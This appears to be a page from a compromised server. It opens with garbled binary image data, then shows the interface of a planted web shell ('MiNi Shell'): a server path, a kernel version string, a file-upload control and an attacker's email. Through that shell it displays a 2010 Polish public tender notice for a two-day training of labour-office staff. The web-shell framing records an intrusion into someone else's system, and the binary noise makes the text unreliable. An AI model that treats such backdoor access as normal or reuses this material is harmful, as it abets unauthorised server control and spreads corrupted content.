JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100901/237751-N-2010.html

<p class="kh_header"><b>Dąbrowa Górnicza: świadczenie usługi przeprowadzenia zamkniętego szkolenia dla pracowników Powiatowego Urzędu Pracy w Dąbrowie Górniczej nt.: Zasad współpracy pracowników PUP w Centrum Aktywizacji Zawodowej w świetle standardów usług rynku pracy oraz Savoir-vivre urzędnika (zasady zachowania w pracy, etykieta w firmie) - jak godnie reprezentować instytucję publiczną realizowanego w ramach projektu Inwestujemy w najlepszych</b><br>
<b>Numer ogłoszenia: 237751 - 2010; data zamieszczenia: 01.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Dąbrowie Górniczej , ul. Sobieskiego 12, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 0-32 262-37-39, faks 0-32 262-69-51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pup-dg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usługi przeprowadzenia zamkniętego szkolenia dla pracowników Powiatowego Urzędu Pracy w Dąbrowie Górniczej nt.: Zasad współpracy pracowników PUP w Centrum Aktywizacji Zawodowej w świetle standardów usług rynku pracy oraz Savoir-vivre urzędnika (zasady zachowania w pracy, etykieta w firmie) - jak godnie reprezentować instytucję publiczną realizowanego w ramach projektu Inwestujemy w najlepszych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi przeprowadzenia zamkniętego szkolenia dla 20 pracowników Powiatowego Urzędu Pracy w Dąbrowie Górniczej 
w terminie  od 25.09.2010 r. do 26.09.2010 r.  nt.:
- zasad współpracy pracowników PUP w Centrum Aktywizacji Zawodowej w świetle standardów usług rynku pracy - 8 godzin, szkolenie o charakterze warsztatowym 
i edukacyjno - doradczym prowadzone aktywnymi metodami angażującymi wszystkich uczestników zarówno podczas wykładów, ćwiczeń grupowych 
i indywidualnych, 
- Savoir-vivre urzędnika (zasady zachowania w pracy, etykieta w firmie) - jak godnie reprezentować instytucję publiczną - 8 godzin, szkolenie o charakterze warsztatowym, prowadzone aktywnymi metodami angażującymi wszystkich uczestników zarówno podczas wykładów, ćwiczeń grupowych i indywidualnych, testów, dyskusji. 
2. Szkolenie  musi być prowadzone przez trenerów posiadających odpowiednią wiedzę oraz praktykę w zakresie wdrażania, realizowania i nadzorowania zadań wynikających 
z przepisów ustawy o promocji zatrudnienia i instytucjach rynku pracy. 
3. Zamawiający planuje przeszkolić w ww. zakresie 20 pracowników.
4. Szkolenie obejmować ma 16 godzin zegarowych. 
5. Godzina zegarowa szkolenia liczy 45 minut zajęć i 15 minut przerwy, przy czym długość przerw może być ustalana elastycznie.
6. Zamawiający wymaga, aby Wykonawca zaproponował szczegółowy program, który ma uwzględnić następujący podstawowy zakres merytoryczny:
6.1 Akty prawne regulujące pracę z klientami PUP.
6.2 Współpraca pracowników kluczowych - szanse i zagrożenia: 
6.2.1 pośrednictwo pracy - zadania pośrednika pracy, 
6.2.2 pośrednictwo zawodowe i informacja zawodowa - zadania doradcy zawodowego,
6.2.3 pomoc w aktywnym poszukiwaniu pracy,
6.2.4 organizacja szkoleń - zadania specjalisty ds. rozwoju zawodowego.  
6.3. Wysoka jakość świadczonych usług gwarancją sukcesu organizacji:
6.3.1 rozpoznanie problemów zawodowych bezrobotnych i poszukujących pracy,
6.3.2 właściwa kwalifikacja bezrobotnych w celu przedstawienia odpowiedniej formy pomocy,
6.3.3 IPD jako skuteczna metoda doprowadzenia bezrobotnego do osiągnięcia wyznaczonego celu. 
6.4 Standardy usług rynku pracy jako instrument stosowany przez pracowników Urzędu Pracy a nie cel sam w sobie. 
6.5 Wizerunek urzędnika jako składowa wizerunku urzędu:
6.5.1 czym jest wizerunek osobisty?
6.5.2  co składa się na wizerunek osobisty urzędnika?
6.5.3  jak wizerunek urzędnika przekłada się na wizerunek urzędu?
6.6 Podstawowe zasady savoir-vivre w pracy:
6.6.1 rozmowy służbowe,
6.6.2 wypowiedź w dyskusji,
6.6.3 kulturalna odmowa, obrazy i przeprosiny,
6.6.4 zachowania w sytuacjach oficjalnych (pierwszeństwo, pozdrawianie, witanie 
i przedstawianie, tytułowanie, postawa wobec klientów),
6.2.5 postawa wobec przełożonych i współpracowników.
6.7.Obsługa klientów uwzględniając zasady pozytywnej komunikacji:
6.7.1 czym jest komunikacja,
6.7.3 efektywność komunikacji, 
6.7.4 dlaczego komunikacja bywa nieskuteczna, bariery komunikacyjne i sposoby ich pokonywania,
6.7.7 werbalne i niewerbalne środki wyrazu,
6.7.8 postawa wobec klienta, 
6.7.9 trudny klient i sposoby radzenia sobie z nim,
6.7.10 zasady rozmowy telefonicznej,
6.7.11 sytuacje konfliktowe i niezręczne - sposoby radzenia sobie w sytuacjach trudnych. 
6.8 Autoprezentacja i wystąpienia publiczne: 
6.8.1 co wpływa na wiarygodność mówcy?
6.8.2 jak sobie radzić w trudnych sytuacjach związanych z publicznym wystąpieniem (stres, zakłopotanie itp.),
6.8.3 jak przygotować się do wystąpienia publicznego,
6.8.4 błędy, których należy unikać. 
Powyższy zakres tematów stanowi katalog otwarty, który Wykonawca może rozszerzyć i uszczegółowić w zaproponowanym programie szkolenia, mając na uwadze cel szkolenia oraz jego przydatność w pracy pracowników.
7. Szkolenie musi być przeprowadzone na terenie górskim, ale odległość z Powiatowego Urzędu Pracy w Dąbrowie Górniczej do miejsca szkolenia nie może przekroczyć 120 km. 
8. Wykonawca zobowiązany jest zapewnić uczestnikom szkolenia transport z siedziby Zamawiającego do miejsca szkolenia i z powrotem. 
9. Szczegóły dotyczące zasad transportu np. godziny wyjazdu zostaną pisemnie ustalone przez Zamawiającego z ostatecznie wybranym Wykonawcą.
10. Wymagania stawiane Wykonawcy:
1) Wykonawca zobowiązany jest zapewnić uczestnikom szkolenia w trakcie trwania szkolenia warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy,
2) Szkolenia powinny odbywać się w sali, o wielkości dostosowanej do liczby uczestników szkolenia, wyposażonej w:
a) miejsca siedzące oraz stoliki dla 20 uczestników oraz jedno miejsce siedzące dla osoby monitorującej szkolenie z ramienia Zamawiającego lub instytucji kontrolującej,
b) dostęp do światła dziennego z możliwością zaciemnienia i zapewnienia oświetlenia sztucznego, klimatyzację,
c) projektor multimedialny, ekran, tablicę typu Flipchart,
d) zaplecze sanitarne.
11. Wykonawca zobowiązany jest zapewnić uczestnikom konieczne materiały szkoleniowe w formie elektronicznej na nośniku pendrive i papierowej - zgodne z tematyką szkolenia. Materiały szkoleniowe powinny być przekazywane uczestnikom szkolenia na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć. Każdy uczestnik szkolenia musi otrzymać długopis, notatnik A4 z podkładką na notowanie. Na materiałach szkoleniowych muszą znaleźć się informacje o współfinansowaniu szkolenia przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki. Zamawiający udostępni Wykonawcy w wersji elektronicznej wymagane logotypy. Wykonawca zobowiązany jest do przekazania jednego kompletu materiałów dydaktycznych Zamawiającemu. 
12. Wykonawca zobowiązany jest zapewnić na szkoleniu:
1) poczęstunku i napojów w ilości co najmniej: 25 butelek niegazowanej wody mineralnej o pojemności od 0,3 do 0,7 litra; 25 butelek gazowanej wody mineralnej 
o pojemności od 0,3 do 0,7 litra; 300 g kawy rozpuszczalnej; 40 torebek herbaty ekspresowej, wrzątek do przygotowania kawy i herbaty w ilości co najmniej 10 litrów; 0,5 kg pierników w czekoladzie, 0,5 kg biszkoptów z dodatkiem galaretki owocowej w polewie czekoladowej; 0,5 kg ciastek kruchych, 0,5 kg wafli cukierniczych przekładanych masą; 0,5 kg paluszków (solone); minimum 50 kubków jednorazowych przystosowanych do napojów gorących. 
2) serwis gastronomiczny (zastawa, przygotowanie, posprzątanie), 
3) dwa obiady - zapewnienie przez Wykonawcę obiadu w formie bufetu obejmującego: dania ciepłe (rybne, mięsne i warzywne), sałatki, zakąski zimne, desery (wyroby cukiernicze, owoce), sok pomarańczowy i jabłkowy, wodę mineralną gazowaną i niegazowaną, a także stoliki koktajlowe i serwis gastronomiczny (przygotowanie, obsługa kelnerska, nakrycie stołów/obrusy, zastawa oraz przygotowanie i sprzątanie),
4) kolację (w pierwszym dniu szkolenia) -  zapewnienie przez Wykonawcę kolacji 
w formie bufetu obejmującego m.in.: dania ciepłe (jajka, jajecznica, kiełbaski, bekon, wyroby mięsne i warzywa z grilla) świeże pieczywo, sałatki, zakąski zimne, owoce, herbata, kawa, sok pomarańczowy i jabłkowy, wodę mineralną gazowaną 
i niegazowaną, a także stoliki koktajlowe i serwis gastronomiczny (przygotowanie, obsługa kelnerska, nakrycie stołów/obrusy, zastawa oraz przygotowanie i sprzątanie),
5) śniadanie (w drugim dniu szkolenia) - zapewnienie przez Wykonawcę śniadania
w formie bufetu obejmującego m.in.: dania ciepłe (jajka, jajecznica, bekon, kiełbaski, warzywa zapiekane) świeże pieczywo, sałatki, zakąski zimne, deska serów, musli, jogurty, płatki śniadaniowe,  owoce świeże, sok pomarańczowy i jabłkowy, wodę mineralną gazowaną i niegazowaną, a także stoliki koktajlowe i serwis gastronomiczny (przygotowanie, obsługa kelnerska, nakrycie stołów/obrusy, zastawa oraz przygotowanie i sprzątanie),
6) zakwaterowanie w trakcie pobytu na szkoleniu - uczestnicy zostaną zakwaterowani w hotelu co najmniej trzy gwiazdkowym, pokojach 2-3 osobowych z pełnym węzłem sanitarnym,
7) salę wykładową w miejscu zakwaterowania uczestników,
8) możliwość atrakcyjnego zagospodarowania czasu wolnego w formach sprzyjających integracji. 
13. Wykonawca zobowiązany jest wystawić każdemu uczestnikowi szkolenia po zakończeniu zaświadczenie według wzoru MEN oraz certyfikat o ukończeniu szkolenia, z przedmiotowym opisem ukończonego szkolenia. Certyfikat zostanie wydrukowany przez Wykonawcę (biały papier, format A4, +/-200g/m2, połyskujący, druk kolorowy). Na certyfikacie muszą znaleźć się informacje o współfinansowaniu szkolenia przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki. Zamawiający udostępni Wykonawcy w wersji elektronicznej wymagane logotypy. 
14. Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu szkolenia stanowiącej: dziennik zajęć edukacyjnych, zawierający listę obecności uwzględniającą podpisy uczestników szkolenia, wymiar godzin i tematy zajęć edukacyjnych, rejestr wydanych dokumentów potwierdzających ukończenie szkolenia oraz listę potwierdzającą odbiór materiałów szkoleniowych i cateringu. 
15. Zamawiający wymaga od Wykonawcy zapewnienia odpowiedniej obsługi technicznej szkolenia poprzez wyznaczenie osoby odpowiedzialnej (osoba ta nie może być jednocześnie trenerem) miedzy innymi za: 
- otwarcie sal przynajmniej na 20 minut przed szkoleniem,
- wietrzenie sali,
- poczęstunek, napoje, 
- rozwieszenie i stałe monitorowanie wizualizacji projektu oraz odpowiednich informacji o umiejscowieniu sali szkoleniowej i współfinansowaniu poprzez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,
- wykonywanie dokumentacji fotograficznej poczęstunku, rozmieszczenie wizualizacji sali szkoleniowej,
- zaopatrzenie toalet w odpowiednie środki higieniczne (papier toaletowy, mydło, ręczniki,
- uruchomienie sprzętu technicznego przed szkoleniem. 
16. Wykonawca zobowiązany będzie do wskazania numeru telefonu, pod którym będzie możliwy kontakt z Wykonawcą w godzinach od 7:30 do 18.00. 
17. Wykonawca przedstawi do akceptacji zamawiającemu, w terminie 3 dni roboczych po podpisaniu umowy szczegółowy harmonogram zajęć dostosowanych do zakresu tematycznego szkolenia. 
18. Wykonawca zobowiązany jest do pokrycia kosztów ubezpieczenia uczestników szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunki te zostały spełnione jeżeli Wykonawca wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedno szkolenie dotyczące zagadnień zasad współpracy pracowników PUP w Centrum Aktywizacji Zawodowej w świetle standardów usług rynku pracy oraz minimum jedno szkolenie dotyczące zagadnień Savoir-vivre urzędnika (zasad zachowania w pracy, etykiety w firmie) - jak godnie reprezentować instytucję publiczną.
W celu potwierdzenia opisanego przez Zamawiającego warunku, Wykonawca ma załączyć wykaz przeprowadzonych szkoleń wg wzoru, który stanowi załącznik nr 4 do niniejszej specyfikacji oraz dokumenty potwierdzające, że szkolenia te zostały zrealizowane lub są realizowane.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowana usługa odpowiada wymaganiom określonym przez Zamawiającego, należy złożyć:
3.1 wypełniony formularz oferty zgodnie z wzorem dostarczonym Wykonawcy wraz ze SIWZ - załącznik nr 1;
3.2 program szkolenia zawierający:
- nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- cel szkolenia,
- plan nauczania określający tematy zajęć (wymienione w pkt. III.6 SIWZ) oraz ich wymiar,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
3.3 oświadczenie dotyczące miejsca szkolenia - dokładny adres gdzie będą się odbywały zajęcia wg wzoru na zał. nr 6 do SIWZ;
3.4 oświadczenie Wykonawcy o zapoznaniu się z warunkami umowy (wzór umowy załącznik nr 7 do SIWZ) oraz nie wnoszeniem co do jej treści żadnych zastrzeżeń (formularz oświadczenia stanowi załącznik nr 8 do SIWZ);
3.5 wzór zaświadczenia oraz certyfikatu potwierdzającego ukończenie szkolenia;
3.6 informacje o zapleczu socjalnym;
3.7 informacje o wielkości sali i jej wyposażeniu;
3.8 zobowiązanie wykonawcy do pokrycia kosztów ubezpieczenia uczestników szkolenia;
3.9 informacje nt.: zagospodarowania czasu wolnego w formach sprzyjających integracji</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 30</li>
<li>3 - Miejsce i warunki szkolenia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pup-dg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
ul. Jana III Sobieskiego 12
41-300 Dąbrowa Górnicza
pok. nr 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy
ul. Jana III Sobieskiego 12
41-300 Dąbrowa Górnicza
Kancelaria pok. nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Inwestujemy w najlepszych jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 6.1.2 Programu Operacyjnego Kapitał Ludzki Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com